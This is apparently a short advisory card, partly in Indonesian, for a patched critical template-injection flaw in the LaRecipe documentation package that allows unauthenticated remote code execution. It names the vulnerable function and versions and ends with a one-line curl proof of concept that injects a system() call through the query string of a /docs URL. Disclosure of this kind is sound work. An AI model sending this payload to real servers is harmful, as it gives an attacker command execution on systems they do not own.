CVE-2025-53833
Kritis
Sudah Ditambal
LaRecipe SSTI → Remote Code Execution
Server-side template injection via query string in public documentation routes.
- Versi Terdampak
- binarytorch/larecipe < 2.8.1
- Ditemukan
- July 14, 2025
`replaceLinks()` embedded full request URI into Blade-evaluated markdown. Unauthenticated RCE with crafted query parameters on `/docs` endpoints.
Proof of Concept
terminal — bash
❯ curl -sk 'https://TARGET/docs/1.0/overview?{{system(id)}}'▌